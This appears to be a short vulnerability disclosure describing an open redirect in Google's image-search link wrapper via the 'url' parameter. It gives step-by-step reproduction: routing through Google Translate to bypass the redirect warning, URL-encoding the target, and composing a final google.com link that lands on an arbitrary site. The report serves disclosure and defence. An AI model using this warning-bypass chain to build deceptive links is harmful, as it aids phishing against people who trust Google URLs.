When a user search an image, generates a link as the following:
https://www.google.com/url?sa=i&url=https%3A%2F%2Felpais.com%2Felpais%2F2017%2F02%2F13%2Fciencia%2F1486986287_013868.html&psig=AOvVaw32qmRyOt4_pkNDMqoVlPeb&ust=1583227169251000&source=images&cd=vfe&ved=0CAIQjRxqFwoTCOjR6_m6--cCFQAAAAAdAAAAABAE
The "url" parameter is not properly validated, so an open redirect can be exploited through this parameter.
Only this parameter is mandatory, so we can exclude some parameters in the GET request because not affect the expected results:
https://www.google.com/url?&url=
How to reproduce the vulnerability:
1. Select the malicious URL
For example:
https://www.isecauditors.com
2. Create the URL redirection to avoid the Google alert message
https://translate.google.com/translate?sl=auto&tl=en&u=
For example:
https://translate.google.com/translate?sl=auto&tl=en&u=www.isecauditors.com
3. Encode the URL redirection
For that, we can use some service as "https://meyerweb.com/eric/tools/dencoder/".
For example:
https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com
4. Create the final URL without Google alert
https://www.google.com/url?sa=i&url=https%3A%2F%2Ftranslate.google.com%2Ftranslate%3Fsl%3Dauto%26tl%3Den%26u%3Dwww.isecauditors.com